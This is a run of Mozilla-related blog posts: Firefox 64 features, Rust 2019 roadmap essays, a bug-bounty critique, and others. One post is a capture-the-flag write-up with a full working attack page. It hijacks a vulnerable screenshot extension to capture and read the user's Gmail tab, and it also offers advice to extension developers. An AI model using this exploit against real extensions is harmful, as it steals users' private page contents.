Standardizing proprietary styling features

As part of our platform work, we’re trying to standardize some of the non-standard CSS features that have often caused developers cross-browser headaches. Landing in 64 we’ve got the following:

New media queries

Firefox 64 sees the addition of new media queries from the Level 4 and Level 5 specifications for detecting pointers/touchscreens, whether the user can hover over something, and whether the user prefers reduced-motion.

Multi-position color stop gradients

CSS gradients now support multi-position color stops (e.g. see their use on linear gradients). For example, yellow 25%, yellow 50% can now be written as yellow 25% 50%.

JavaScript improvements

There were a lot of internal improvements this time around. In terms of developer facing improvements:

New Web API highlights

Fullscreen API unprefixed

Goodbye mozRequestFullScreen! The Fullscreen API is now available in Firefox without a prefix. The requestFullscreen and exitFullscreen APIs now also return promises that resolve once the browser finishes transitioning between states.

WebVR 1.1 in macOS

What’s more immersive than Fullscreen? Virtual reality, of course. And Firefox 64 now supports WebVR 1.1 on macOS!

startMessages() for Service Workers

On a completely unrelated note, pages with Service Workers can now use the startMessages() API to begin receiving queued worker messages, even before page loading has completed.

New Add-ons Features

What follows are the highlights. For more details, see Extensions in Firefox 64.

Context menu enhancements

Firefox 64 introduces an entirely new API, browser.menus.overrideContext, which allows complete customization of the context menu shown within add-on content like sidebars, popups, etc. These context menus can also automatically include custom entries from other add-ons, as though the user had right-clicked on a tab or bookmark. Piro’s blog post explains how it all works.

A custom context menu used by the Tree Style Tab extension

In addition:

  • You can now restrict where context menus can appear in an add-on using the new viewTypes property in menus.create() and menus.update().
  • menus.update() can now be used to update the icon of an existing menu item.
  • Extensions can now detect which mouse button was used when a menu item was clicked — this can be found using the new button property of menus.OnClickData.

Custom content in the Dev Tools inspector

Also, add-ons can now display custom content within the Dev Tools Inspector sidebar by calling the new sidebar.setPage() API.

Managing add-ons updated

For users, the add-on management interface, about:addons, was redesigned to match Firefox’s preferences page, and right-clicking an add-on icon in the browser toolbar now offers options to directly remove or manage that add-on.

Privacy features for your protection

Symantec CA Distrust

Due to a history of malpractice, Firefox 64 will not trust TLS certificates issued by Symantec (including under their GeoTrust, RapidSSL, and Thawte brands). Microsoft, Google, and Apple are implementing similar measures for their respective browsers.

Referrer-Policy for stylesheets

The Referrer-Policy header now applies to requests initiated by CSS (e.g., background-image: url("http://...") ). The default policy, no-referrer-when-downgrade, omits referrer information when a secure origin (https) requests data from an insecure origin (http).

buildID fixed timestamp

Lastly, from now on the non-standard navigator.buildID property will always return a fixed timestamp, 20181001000000, to mitigate its potential abuse for fingerprinting.

Further Reading

For more information, see Firefox 64 for Developers on MDN, and the official Firefox 64 Release Notes. If you’re a web developer, you may also be interested in the Firefox 64 Site Compatibility notes.

The post Firefox 64 Released appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla Blog: Latest Firefox Release Available Today

It’s the season for spending time with family and friends over a nice meal and exchanging gifts. Whether it’s a monogrammed bag or a nicely curated 2019 calendar of family photos, it’s the practical gifts that get the most use.

For Firefox, we’re always looking for ways to simplify and personalize your online experience. For today’s version of Firefox for desktop, we have a couple new features that do just that. They include:

Contextual Feature Recommender (CFR)

Aimed at people who are looking to get more out of their online experience or ways to level up, CFR is a system that proactively recommends Firefox features and add-ons based on how you use the web. For example, if you open multiple tabs and repeatedly use these tabs, we may offer a feature called “Pinned Tabs” and explain how it works. Firefox curates the suggested features and notifies you. With today’s release, we will start to roll out three recommended extensions: Facebook Container, Enhancer for YouTube and To Google Translate. This feature is available for US users in regular browsing mode only. Recommendations will not appear in Private Browsing mode. Also, Mozilla does NOT receive a copy of your browser history. The entire process happens locally in your copy of Firefox.

Multiple Tab Organization

When you go online, it’s not uncommon to have several tabs open on a variety of topics. Whether it’s dinner recipes or gift ideas for your family, it can add up to a lot of tabs. How does anyone ever organize all those tabs? In today’s release, you can now shift- or ctrl-click multiple tabs from the tab bar, and organize them the way you want. You can mute, move, bookmark or pin them quickly and easily.

Here’s a link to our release notes for a complete list of what’s included in today’s release.

Check out and download the latest version of Firefox Quantum available here. For the latest version of Firefox for iOS, visit the App Store.

 

The post Latest Firefox Release Available Today appeared first on The Mozilla Blog.

Nick Fitzgerald: Rust 2019: Think Bigger

Rust shines when we find ways to have our cake and eat it too: memory safety without runtime garbage collection, abstraction without overhead, threading without data races. We must find new ways to continue this tradition for Rust 2019 and beyond.

On a day-to-day basis, I am dedicated to small, incremental progress. If a pull request is an improvement over the status quo, merge it now! Don’t wait for the pull request to be perfectly pristine or the feature to be 100% complete. Each day we drag reality inch by inch towards the ideal.

However, when planning on the scale of years, our vision must not be weighed down by discussion of incremental improvements: we must rise and collectively define the lofty ideals we aim for. It requires avoiding local maxima. Nick Cameron’s Rust in 2022 post, where he starts with what we might want in a Rust 2022 edition and then works backwards from there, is a great example.

With that out of the way, I will make a couple suggestions for the Rust 2019 roadmap. I will leave my thoughts for the Rust and WebAssembly domain working group’s 2019 roadmap for a future post.

Speed Up Compilation

Tired: make rustc faster.

Wired: integrate distributed compilation and artifact caching into cargo and crates.io.

Of course we should continue identifying and implementing performance wins in rustc itself. We should even invest in larger scale rearchitecting, like adding finer-grained parallelism with rayon (I won’t go into too many specifics here because I’m largely ignorant of them!).

But we should also be thinking bigger.

The fastest compilation is the one that you didn’t have to do. If we integrate something like sccache into cargo and crates.io, then individuals can download pre-built artifacts for common dependencies from a shared cache and save big on local CPU time. In comparison, a 5% speedup to trait resolution is peanuts. This is an opportunity that is not available to most language ecosystems! Most languages don’t have a compiler toolchain, build system, and package manager that are widely used together and well integrated.

First-Class, Domain-Specific Workflows

Tired: make wasm-pack really good.

Wired: make wasm-pack unnecessary by building generic task hooks into cargo itself.

Different domains have different workflows that extend past cargo build. With WebAssembly, we must also generate JavaScript bindings, run tools like wasm-opt, create a package.json to integrate with NPM and JavaScript tooling, etc… For embedded development, you need to at minimum flash your built program into your microcontroller’s persistent memory.

To perform these tasks today, we typically write whole new tools that wrap cargo (like wasm-pack), invoke external tools manually (like using openocd by hand), or write a cargo-mytask package to add the cargo mytask subcommand. These solutions suffer from either repetition and a lack of automation, or they wrap cargo but fail to expose all the wonderful features that cargo supports (for example, you can’t use the --feature flag yet with wasm-pack). We should not write these tools that wrap cargo, we should write generic build tasks, which are invoked automatically by cargo itself.

cargo should not just grow a post_build.rs hook, its build tasks and dependencies between tasks and artifacts should become fully extensible. I should be able to depend on wasm build tasks in my Cargo.toml, and then after that cargo build should just Do The Right Thing. I shouldn’t have to compile these wasm build tasks for every project I use them with. cargo and crates.io should handle transparently distributing the wasm task binaries to me.

Growing Working Groups

Tired: the Rust project should start a working group for $PROJECT_OR_DOMAIN.

Wired: the Rust project should have a working group template, and system of mentorship for new (and old!) working group leads.

The more we collaborate and work together, the better we can tackle problems that are larger than any one of us. The primary way we’ve been organizing technical efforts in the Rust project has been working groups. But starting a new working group is hard, and leading a working group is hard.

We should have a template for new working groups that comes with cookie-cutter steps to follow to help build an open community, articulate working group vision, and collectively organize. Of course these steps will need to evolve for each particular working group’s needs, but having something to help new working groups hit the ground running is incredibly valuable. It would have been so useful for me when we were kicking off the WebAssembly domain working group last year. A lot of things that are obvious in retrospect were not at the time: hold weekly meetings, adopt an RFC process, communicate(!!), create room for contributors to own sub-goals, etc…

Additionally, every working group lead should have a mentor who is in a leadership position within the Rust project: someone who is a member of the Rust core team or a lead of another working group or team. Someone to rubber duck with and seek guidance from in the context of leadership and organization.

Instead of enabling Rust users to ask Rust leadership for a working group for X, we should empower them to start the working group for X themselves, and we should continuously follow up to ensure that they succeed. To have our cake and eat it too, Rust development must be a positive-sum game.

#Rust2019

Whatever we end up with in the 2019 roadmap, I have faith that what we choose will be worthy. We don’t suffer from a lack of good options.

I hope we never stop dreaming big and being ambitious.

This Week In Rust: This Week in Rust 264

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Crate of the Week

This week's crate is lsd, a colorful and fast ls replacement. Thanks to Pierre Peltier for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

264 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
Asia Pacific
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

I'll know ide support is mature when the flame wars start.

– Unnamed friend of arthrowpod

Thanks to arthrowpod for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Nick Cameron: Rust in 2022

A response to the call for 2019 roadmap blog posts.

In case you missed it, we released our second edition of Rust this year! An edition is an opportunity to make backwards incompatible changes, but more than that it's an opportunity to bring attention to how programming in Rust has changed. With the 2018 edition out of the door, now is the time to think about the next edition: how do we want programming in Rust in 2022 to be different to programming in Rust today? Once we've worked that out, lets work backwards to what should be done in 2019.

Without thinking about the details, lets think about the timescale and cadence it gives us. It was three years from Rust 1.0 to Rust 2018 and I expect it will be three years until the next edition. Although I think the edition process went quite well, I think that if we'd planned in advance then it could have gone better. In particular, it felt like there were a lot of late changes which could have happened earlier so that we could get more experience with them. In order to avoid that I propose that we aim to avoid breaking changes and large new features landing after the end of 2020. That gives 2021 for finishing, polishing, and marketing with a release late that year. Working backwards, 2020 should be an 'impl year' - focussing on designing and implementing the things we know we want in place for the 2021 edition. 2019 should be a year to invest while we don't have any release pressure.

To me, investing means paying down technical debt, looking at our processes, infrastructure, tooling, governance, and overheads to see where we can be more efficient in the long run, and working on 'quality of life' improvements for users, the kind that don't make headlines but will make using Rust a better experience. It's also the time to investigate some high-risk, high-reward ideas that will need years of iteration to be user-ready; 2019 should be an exciting year!

The 2021 edition

I think Rust 2021 should be about Rust's maturity. But what does that mean? To me it means that for a programmer in 2022, Rust is a safe choice with many benefits, not a high-risk/high-reward choice. Choosing Rust for a project should be a competitive advantage (which I think it is today), but it should not require investment in libraries, training, or research.

Some areas that I think are important for the 2021 edition:

  • sustainability: Rust has benefited from being a new and exciting language. As we get more mature, we'll become less exciting. We need to ensure that the Rust project has sufficient resources for the long term, and that we have a community and governance structure that can support Rust through the (hopefully) long, boring years of its existence. We'll need to think of new ways to attract and retain users (as well as just being awesome).
  • diversity: Rust's community has a good reputation as a welcoming community. However, we are far from being a diverse one. We need to do more.
  • mature tools: Cargo must be more flexible, IDE support must be better, debugging, profiling, and testing need to be easy to use, powerful, and flexible. We need to provide the breadth and depth of tool support which users expect from established languages.
  • async programming: high-performance network programming is an amazing fit for Rust. Work on Linkerd and Fuchsia has already proved this out. Having a good story around async programming will make things even better. I believe Rust could be the best choice in this domain by a wide margin. However, building out the whole async programming story is a huge task, touching on language features, libraries, documentation, programming techniques, and crates. The current work already feels huge and I believe that this is only the beginning of iteration.
  • std, again: Rust's standard library is great, a point in favour of Rust. Since Rust 1.0 there have been steady improvements, but the focus has been on the wider ecosystem. I think for the next edition we will need to consider a second wave of work. There are some fundamental things that are worth re-visiting (e.g., Parking Lot mutexes), and a fair few things where our approach has been to let things develop as crates 'for now', and where we either need to move them into std, or re-think user workflow around discoverability, etc. (e.g., Crossbeam, Serde).
  • error handling: we really need to improve the ergonomics of error handling. Although the mechanism is (IMO) really great, it is pretty high-friction compared to exceptions. We should look at ways to improve this (Ok-wrapping, throws in function signatures, etc.); see the sketch after this list. I think this is an edition issue since it will probably require a breaking change, and at the least will change the style of programming.
  • macros: we need to 'finish' macros, both procedural and declarative. That means being confident about our hygiene and naming implementation, iterating on libraries, stabilising everything, and supporting the modern macro syntax.
  • internationalisation: we need to do much better. We need internationalisation and localisation libraries on a path to stabilisation, either in std or discoverable and easily usable as crates. It should be as easy to print or use a multi-locale string as a single-locale one. We also need to do better at the project-level - more local conferences, localised documentation, better ways for non-English speakers to be part of the Rust community.

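To make the friction concrete, here is a minimal sketch of today's ?-based error handling. The AppError type and its From impls are invented for illustration, but they show the boilerplate and explicit Ok-wrapping that ideas like Ok-wrapping and throws aim to reduce.

use std::{fs, io, num::ParseIntError};

// A hypothetical application error type; every source error needs its own
// variant and From impl before `?` will convert into it.
#[derive(Debug)]
enum AppError {
    Io(io::Error),
    Parse(ParseIntError),
}

impl From<io::Error> for AppError {
    fn from(e: io::Error) -> Self { AppError::Io(e) }
}

impl From<ParseIntError> for AppError {
    fn from(e: ParseIntError) -> Self { AppError::Parse(e) }
}

fn read_port(path: &str) -> Result<u16, AppError> {
    let text = fs::read_to_string(path)?; // io::Error -> AppError
    let port = text.trim().parse()?;      // ParseIntError -> AppError
    Ok(port)                              // the explicit Ok-wrapping in question
}
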
Let's keep focussing on areas where Rust has proven to be a good fit (systems, networking, embedded (both devices and as performance-critical components in larger systems), WASM, games) and looking for new areas to expand into.

2019

So, with the above in mind, what should we be doing next year? Each team should be thinking about which high-risk experiments to try. How can we tackle technical (and community) debt? What can be polished? Let's spend the year making sure we are on the right track for the next edition and the long-term by encouraging people to dedicate more energy to strategy.

Of course we want to plan some concrete work too, so in no particular order here are some specific ideas I think are worth looking into:

  • discoverability of libraries and tools: how does a new user find out about Serde or Clippy?
  • project infrastructure: are bors, homu, our repo structures, and our processes optimal? How can we make contributing to Rust easier and faster?
  • the RFC process: RFCs are good, but the process has some weaknesses: discussion is scattered around different venues, discussions are often stressful, writing an RFC is difficult, and so forth. We can do better!
  • project governance: we have to keep scaling and iterating. 2019 is a good opportunity to think about our governance structures.
  • moderation and 'tone' of discussion: we need to keep scaling moderation and think about better ways to moderate forums. Right now we do a good job of enforcing the CoC and removing egregious offenders, however, many of our forums can feel overwhelming or hostile. We should strive for more professional and considerate spaces.
  • security of Rust code: starting the secure code working group is very timely. I think we're going to have look closely at ways we can make using and working with Rust code safer. From changes to Cargo and crates.io, to reasoning about unsafe code.
  • games and graphics: as well as keeping going with the existing domain working groups, we should also look at games and graphics. Since these are such performance sensitive areas, Rust should be a good fit. There is already a small, but energetic community here and some initial uses in production.
  • async/await and async programming: we need to keep pushing here on all fronts (language, std, crates, docs, gaining experience).

And let's dive a tiny bit deeper into a few areas:

Dev-tools

  • Cargo: Cargo needs to integrate better with other build systems and IDEs. There are a lot of places where people want more flexibility; it will take another blog post to get into this.
  • More effort on making the RLS good.
  • Better IDE experience: more features, more polish, debugging and profiling integration.
  • integrating Rustdoc, docs.rs, and cargo-src to make a best-in-class documentation and source code exploration experience
  • work on a query API for the compiler to be a better base for building tools. Should support Clippy as well as the RLS, code completion, online queries, etc.

Language

Even more than the other areas, the language team needs to think about development cadence in preparation for the next edition. We need to ensure that everything, especially breaking changes, gets enough development and iteration time.

Some things I think we should consider in 2019:

  • generic associated types or HKTs or whatever: we need to make sure we have a feature which solves the problems we need to solve and isn't going to require more features down the road (i.e., we should aim for this being the last addition to the trait system); see the sketch after this list.
  • specialisation: is this going to work? I think that in combination with macros, there are some smart ways that we can work with error types and do some inheritance-like things.
  • keep pushing on unfinished business (macros, impl Trait, const functions, etc.).
  • named and optional arguments: this idea has been around for a while, but has been low priority. I think it would be very useful (there are some really ergonomic patterns in Swift that we might do well to emulate).
  • enum variant types: this is small, but I REALLY WANT IT!
  • gain experience with, and polish the new module system
  • identify and fix paper cuts

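As a sketch of the motivation, here is the classic streaming-iterator example for generic associated types. The syntax roughly follows the GAT RFC and does not compile on stable Rust today; it is only meant to illustrate the kind of problem the feature should solve.

// A "streaming" iterator whose items may borrow from the iterator itself.
// Without generic associated types, Item cannot mention the lifetime of the
// &mut self borrow in next(), so this trait cannot be expressed today.
trait StreamingIterator {
    type Item<'a>;

    fn next(&mut self) -> Option<Self::Item<'_>>;
}

// An implementor could then hand out overlapping windows into its own buffer,
// e.g. type Item<'a> = &'a [u8];
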
Compiler

Nothing really new here, but we need to keep pushing on compiler performance - it comes up again and again as a Rust negative. We should also take the timing opportunity to do some refactoring, for example, landing Chalk and doing something similar for name resolution.

Wladimir PalantIf your bug bounty program is private, why do you have it?

The big bug bounty platforms are structured like icebergs: the public bug bounty programs that you can see are only a tiny portion of everything that is going on there. As you earn your reputation on these platforms, they will be inviting you to private bug bounty programs. The catch: you generally aren’t allowed to discuss issues reported via private bug bounty programs. In fact, you are not even allowed to discuss the very existence of that bug bounty program.

I’ve been playing along for a while on Bugcrowd and Hackerone and submitted a number of vulnerability reports to private bug bounty programs. As a result, I became convinced that these private bug bounty programs are good for the bottom line of the bug bounty platforms, but otherwise their impact is harmful. I’ll try to explain here.

What is a bug bounty?

When you collect a bug bounty, that’s not because you work for a vendor. There is no written contract that states your rights and obligations. In its original form, you simply stumble upon a security vulnerability in a product and you decide to do the right thing: you inform the vendor. In turn, the vendor gives you the bug bounty as a token of their appreciation. It could be a monetary value but also some swag or an entry in the Hall of Fame.

Why pay you when the vendor has no obligation to do so? Primarily to keep you doing the right thing. Some vulnerabilities could be turned into money on the black market. Some could be used to steal data or extort the vendor. Everybody prefers people to earn their compensation in a legal way. Hence bug bounties.

What the bug bounty isn’t

There are so many bug bounty programs around today that many people have made them their main source of income. While there are various reasons for that, one thing should not be forgotten: there is no law guaranteeing that you will be paid fairly. No contract means that your reward is completely dependent on the vendor. And it is hard to know in advance: sometimes the vendor will claim that they cannot reproduce the issue, downplay its severity, or mark your report as a duplicate of a barely related one. In at least some cases there appears to be intent behind this behavior, with the vendor trying to fit the bug bounty program into a certain budget regardless of the volume of reports. So any security researcher trying to make a living from bug bounties has to calculate pessimistically, e.g. expect that only one out of five reports will get a decent reward.

On the vendor’s side, there is a clear desire for the bug bounty program to replace penetration tests. Bugcrowd noticed this trend and is touting their bug bounty programs as the “next gen pen test.” The trouble is, bug bounty hunters are only paid for bugs where they can demonstrate impact. They have no incentives to report minor issues, not only will the effort of demonstrating the issue be too high for the expected reward, it also reduces their rating on the bug bounty platform. They have no incentives to point out structural weaknesses, because these reports will be closed as “informational” without demonstrated impact. They often have no incentives to go for the more obscure parts of the product, these require more time to get familiar with but won’t necessarily result in critical bugs being discovered. In short, a “penetration test” performed by bug bounty hunters will be anything but thorough.

How are private bug bounties different for researchers?

If you feel that you are treated unfairly by the vendor, you have essentially two options. You can just accept it and vote with your feet: move on to another bug bounty program and learn how to recognize programs that are better avoided. The vendor won’t care as there will be plenty of others coming their way. Or you can make a fuss about it. You could try to argue and probably escalate to the bug bounty platform vendor, but IMHO this rarely changes anything. Or you could publicly shame the vendor for their behavior and warn others.

The latter is made impossible by the conditions to participate in private bug bounty programs. Both Bugcrowd and Hackerone disallow you from talking about your experience with the program. Bug bounty hunters are always dependent on the good will of the vendor, but with private bug bounties it is considerably worse.

But it’s not only that. Usually, security researchers want recognition for their findings. Hackerone even has a process for disclosing vulnerability reports once the issue has been fixed. Public Bugcrowd programs also usually provide for coordinated disclosure. This gives the reporters the deserved recognition and allows everybody else to learn. But guess what: with private bug bounty programs, disclosure is always forbidden.

Why will people participate in private bug bounties at all? Main reason seems to be the reduced competition, finding unique issues is easier. In particular, when you join in the early days of a private bug bounty program, you have a good opportunity to generate cash with low hanging fruit.

Why do companies prefer private bug bounties?

If a bug bounty is about rewarding a random researcher who found a vulnerability in the product, how does a private bug bounty program make sense then? After all, it is like an exclusive club and unlikely to include the researcher in question. In fact, that researcher is unlikely to know about the bug bounty program, so they won’t have this incentive to do the right thing.

But the obvious answer is: the bug bounty platforms aren’t actually selling bug bounty management, they are selling penetration tests. They promise vendors to deliver high-quality reports from selected hackers instead of the usual noise that a public bug bounty program has to deal with. And that’s what many companies expect (but don’t receive) when they create a private bug bounty.

There is another explanation that seems to match many companies. These companies know perfectly well that they just aren’t ready for it yet. Sometimes they simply don’t have the necessary in-house expertise to write secure code, so even with their bug bounty program always pointing out the same mistakes, they will keep repeating them. Or they won’t free up developers from feature work to tackle security issues, so every year they will fix five issues that seem particularly severe but leave all the others untouched. So they go for a private bug bounty program because doing the same thing in public would be disastrous for their PR. And they hope that this bug bounty program will somehow make their product more secure. Except it doesn’t.

On Hackerone I also see another mysterious category: private bug bounty programs with zero activity. So somebody went through the trouble of setting up a bug bounty program but failed to make it attractive to researchers. Either it offers no rewards, or it expects people to buy some hardware that they are unlikely to own already, or the description of the program is impossible to decipher. Just now I’ve been invited to a private bug bounty program where the company’s homepage was completely broken, and I still don’t really understand what they are doing. I suspect that these bug bounty programs are another example of features that somebody got a really nice bonus for but nobody bothered to put any thought into.

Somebody told me that their company went with a private bug bounty because they work with selected researchers only. So it isn’t actually a bug bounty program but really a way to manage communication with that group. I hope that they still have some other way to engage with researchers outside that elite group, even if it doesn’t involve monetary rewards for reported vulnerabilities.

Conclusions

As a security researcher, I’ve collected plenty of bad experiences with private bug bounty programs, and I know that other people did as well. Let’s face it: the majority of private bug bounty programs shouldn’t have existed in the first place. They don’t really make the products in question more secure, and they increase frustration among security researchers. And while some people manage to benefit financially from these programs, others are bound to waste their time on them. The confidentiality clauses of these programs substantially weaken the position of the bug bounty hunters, which isn’t too strong to start with. These clauses are also an obstacle to learning on both sides, ideally security issues should always be publicized once fixed.

Now the ones who should do something to improve this situation are the bug bounty platforms. However, I realize that they have little incentive to change it and are in fact actively embracing it. So while one could ask, for example, for a way to comment on private bug bounty programs so that newcomers can learn from the experiences others have had with a program, such control mechanisms are unlikely to materialize. Publishing anonymized reports from private bug bounty programs would also be nice and just as unlikely. I wonder whether the solution is to add such features via a browser extension and whether it would gain sufficient traction then.

But really, private bug bounty programs are usually a bad idea. Most companies doing that right now should either switch to a public bug bounty or just drop their bug bounty program altogether. Katie Moussouris is already very busy convincing companies to drop bug bounty programs they cannot make use of, please help her and join that effort.

Wladimir PalantBBN challenge resolution: Exploiting the Screenshotter.PRO browser extension

The time has come to reveal the answer to my next BugBountyNotes challenge called Try out my Screenshotter.PRO browser extension. This challenge is a browser extension supposedly written by a naive developer for the purpose of taking webpage screenshots. While the extension is functional, the developer discovered that some websites are able to take a peek into their Gmail account. How does that work?

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

Taking control of the extension UI

This challenge has been inspired by the vulnerabilities I discovered around the Firefox Screenshots feature. Firefox Screenshots is essentially a built-in browser extension in Firefox, and while it takes care to isolate its user interface in a frame protected by the same-origin policy, I discovered a race condition that allowed websites to change that frame into something they can access.

This race condition could not be reproduced in the challenge because the approach used works in Firefox only. So the challenge uses a different approach to protect its frame from unwanted access: it creates a frame pointing to https://example.com/ (the website cannot access it due to same-origin policy), then injects its user interface into this frame via a separate content script. And since a content script can only be injected into all frames of a tab, the content script uses the (random) frame name to distinguish the “correct” frame.

And here lies the issue of course. While the webpage cannot predict what the frame name will be, it can see the frame being injected and change the src attribute to something else. It can load a page from the same server, and then it will be able to access the injected extension UI. A submission I received for this challenge solved this even more elegantly: by assigning window.name = frame.name it made sure that the extension UI was injected directly into their webpage!

Now the only issue is bringing up the extension UI. With Firefox Screenshots I had to rely on the user clicking “Take a screenshot.” The extension in the challenge, however, allowed triggering its functionality via a hotkey. And, as so often happens, it failed to check event.isTrusted, so it would accept events generated by the webpage. Since the extension handles events synchronously, the following code is sufficient here:

// Synthesize the extension's Ctrl+Shift+S hotkey; the handler does not verify
// event.isTrusted, so this fake event is accepted.
window.dispatchEvent(new KeyboardEvent("keydown", {
  key: "S",
  ctrlKey: true,
  shiftKey: true
}));
// The extension has now injected its UI frame; repoint it at a page from our
// own origin so that we can reach inside it.
let frame = document.getElementsByTagName("iframe")[0];
frame.src = "blank.html";

Recommendation for developers: Any content which you inject into websites should always be contained inside a frame that is part of your extension. This at least makes sure that the website cannot access the frame contents, but you still have to worry about clickjacking and spoofing attacks.

Also, if you ever attach event listeners to website content, always make sure that event.isTrusted is true, so it’s a real event rather than the website playing tricks on you.

What to screenshot?

Once the webpage can access the extension UI, clicking the “Screenshot to clipboard” button programmatically is trivial. Again, event.isTrusted is not checked here. However, even though Firefox Screenshots only accepted trusted events, that didn’t help it much: at this point the webpage can make the button transparent and huge, so whenever the user clicks somewhere, the button is triggered.

The webpage can create a screenshot, but what’s the big deal? With Firefox Screenshots I only realized it after creating the bug report: the big issue is that the webpage can screenshot third-party pages. Just load some page in a frame and it will be part of the screenshot, even though you normally cannot access its contents. The only trouble: really critical sites such as Gmail don’t allow being loaded in a frame these days.

Luckily, this challenge had to be compatible with Chrome. And while Firefox extensions can use the tabs.captureTab method to capture a specific tab, there is nothing comparable for Chrome. The solution the hypothetical extension author took was to use the tabs.captureVisibleTab method, which works in any browser. Side effect: the visible tab isn’t necessarily the tab where the screenshotting UI lives.

So the attack starts by asking the user to click a button. When clicked, that button opens Gmail in a new tab. The original page stays in the background and initiates screenshotting. When the screenshot is done, it will contain Gmail, not the attacking website.

How to get the screenshot?

The last step is getting the screenshot which is being copied to clipboard. Here, a Firefox bug makes things a lot easier for attackers. Until very recently, the only way to copy something to clipboard was calling document.execCommand() on a text field. And Firefox doesn’t allow this action to be performed on the extension’s background page, so extensions will often resort to doing it in the context of web pages that they don’t control.

The most straightforward solution is registering a copy event listener on the page; it will be triggered when the extension attempts to copy to the clipboard. That’s how I did it with Firefox Screenshots, and one of the submitted answers also uses this approach. But I actually forgot about it when I created my own solution for this challenge, so I used mutation observers to see when a text field is inserted into the page and read out its value (the actual screenshot URL):

let observer = new MutationObserver(mutationList =>
{
  for (let mutation of mutationList)
  {
    // The extension inserts a <textarea> holding the screenshot URL in order
    // to copy it to the clipboard; read out its value as soon as it appears.
    if (mutation.addedNodes[0] && mutation.addedNodes[0].localName == "textarea")
      document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
  }
});
observer.observe(document.body, {childList: true});

I hope that the new Clipboard API finally makes things sane here, so it isn’t merely more elegant but also gets rid of this huge footgun. But I haven’t had a chance to play with it yet, as this API has only been available since Chrome 66 and Firefox 63. So the recommendation is still: make sure to run any clipboard operations in a context that you control. If the background page doesn’t work, use a tab or frame belonging to your extension.

The complete solution

That’s pretty much it; everything else is only about visuals and timing. The attacking website needs to hide the extension UI so that the user doesn’t suspect anything. It also has no way of knowing when Gmail finishes loading, so it has to wait some arbitrary time. Here is what I ended up with. It is one way to solve this challenge, but certainly not the only one.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Screenshotter.PRO browser extension (solution)</title>
    <script>
      function runAttack()
      {
        let targetWnd = window.open("https://gmail.com/", "_blank");

        window.dispatchEvent(new KeyboardEvent("keydown", {
          key: "S",
          ctrlKey: true,
          shiftKey: true
        }));

        let frame = document.getElementsByTagName("iframe")[0];
        frame.src = "blank.html";
        frame.style.visibility = "hidden";
        frame.addEventListener("load", () =>
        {
          // Leave some time for gmail.com to load
          window.setTimeout(function()
          {
            frame.contentDocument.getElementById("do_screenshot").click();

            let observer = new MutationObserver(mutationList =>
            {
              for (let mutation of mutationList)
              {
                if (mutation.addedNodes[0] && mutation.addedNodes[0].localName == "textarea")
                {
                  targetWnd.close();
                  document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
                }
              }
            });
            observer.observe(document.body, {childList: true});
          }, 2000);
        });
      }
    </script>
  </head>
  <body>
    <button onclick="runAttack();">Click here for a surprise!</button>
  </body>
</html>

Ryan HarterSlow to respond through 2018

I'm working on an urgent and high priority request for the next few weeks. To make sure I can finish this work in 2018 I'm limiting my meetings and communications for the remainder of the year.

Slack is good for getting my immediate attention, but if your request takes more than a one-word response, it's likely to get lost in the shuffle. If you need me to take some action, filing a bug is your best bet. If you don't want to file a bug, email is fine. Keep in mind that my response time will be very slow during this period.

If you need immediate help, try the following:

  • If your question is about a search analysis or new search telemetry, please contact bmiroglio AT mozilla.com
  • If your question is about search data, see the documentation here. If that doesn't help, contact wlach AT mozilla.com
  • For general data science questions contact rweiss AT mozilla.com
  • For general telemetry questions, ask #fx-metrics on Slack or #datapipeline on IRC

Otherwise, I'll get back to you as soon as I can! Thanks for your understanding.

Cameron KaiserTenFourFox FPR11 available

TenFourFox Feature Parity Release 11 final is now available for testing (downloads, hashes, release notes). Issue 525 has stuck, so that's being shipped and we'll watch for site or add-on compatibility fallout (though if you're reporting a site or add-on that doesn't work with FPR11, or for that matter any release, please verify that it still worked with prior versions: particularly for websites, it's more likely the site changed than we did). There are no other changes other than bringing security fixes up to date. Assuming no problems, it will go live tomorrow evening as usual.

FPR12 will be a smaller-scope release, but there will still be some minor performance improvements and bugfixes, and with any luck we will also be shipping Raphaël's enhanced AltiVec string matcher in this release. Because of the holidays, family visits, etc., however, don't expect a beta until around the second week of January.

The Mozilla BlogGoodbye, EdgeHTML

Microsoft is officially giving up on an independent shared platform for the internet. By adopting Chromium, Microsoft hands over control of even more of online life to Google.

This may sound melodramatic, but it’s not. The “browser engines” — Chromium from Google and Gecko Quantum from Mozilla — are “inside baseball” pieces of software that actually determine a great deal of what each of us can do online. They determine core capabilities such as which content we as consumers can see, how secure we are when we watch content, and how much control we have over what websites and services can do to us. Microsoft’s decision gives Google more ability to single-handedly decide what possibilities are available to each one of us.

